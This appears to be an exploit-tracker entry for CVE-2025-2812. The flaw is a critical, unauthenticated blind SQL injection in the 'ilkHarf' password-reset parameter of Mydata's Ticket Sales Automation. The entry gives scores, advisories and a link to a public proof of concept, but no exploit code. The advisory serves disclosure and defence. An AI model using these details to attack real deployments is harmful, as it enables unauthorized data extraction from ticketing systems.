CVE-2025-2812

CRITICAL

Mydata Ticket Sales Automation < 2025-04-03 - Blind SQL Injection

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2025-2812. PoCs published by sahici.

AI-analyzed exploit summary This repository provides a detailed proof-of-concept for CVE-2025-2812, a Boolean-based Blind SQL Injection vulnerability in 'Bilet Satış Otomasyonu' by Mydata Bilişim Ltd. Şti. The exploit targets the 'ilkHarf' parameter in the password reset functionality, allowing unauthorized data extraction.

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mydata Informatics Ticket Sales Automation allows Blind SQL Injection. This issue affects Ticket Sales Automation: before 03.04.2025 (DD.MM.YYYY).

Exploits (1)

nomisec WORKING POC

by sahici · poc

https://github.com/sahici/CVE-2025-2812

View Code ZIP pw:eip

This repository provides a detailed proof-of-concept for CVE-2025-2812, a Boolean-based Blind SQL Injection vulnerability in 'Bilet Satış Otomasyonu' by Mydata Bilişim Ltd. Şti. The exploit targets the 'ilkHarf' parameter in the password reset functionality, allowing unauthorized data extraction.

Classification

Working Poc 95%

Attack Type

Sqli

Complexity

Moderate

Reliability

Reliable

Target: Bilet Satış Otomasyonu by Mydata Bilişim Ltd. Şti

No auth needed

Prerequisites: Access to the vulnerable endpoint · Basic knowledge of SQL injection techniques

MITRE ATT&CK

T1189 - Drive-by Compromise T1505 - Server Software Component

devstral-2 · analyzed Feb 16, 2026 Full analysis →

References (3)

Core 3

Core References

Third Party Advisory government-resource broken-link

https://www.usom.gov.tr/bildirim/tr-25-0099

Various Sources technical-description

https://github.com/sahici/CVE-2025-2812/

View Writeup ZIP pw:eip

Government Resource government-resource

https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0099

Scores

CVSS v3 9.8

EPSS 0.0039

EPSS Percentile 30.6%

Attack Vector NETWORK

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment

Exploitation poc

Automatable yes

Technical Impact total

Details

CWE

CWE-89

Status published

Products (2)

mydata/ticket_sales_automation < 2025-04-03

Mydata Informatics/Ticket Sales Automation < 03.04.2025 (DD.MM.YYYY)

Published May 02, 2025

Tracked Since Feb 18, 2026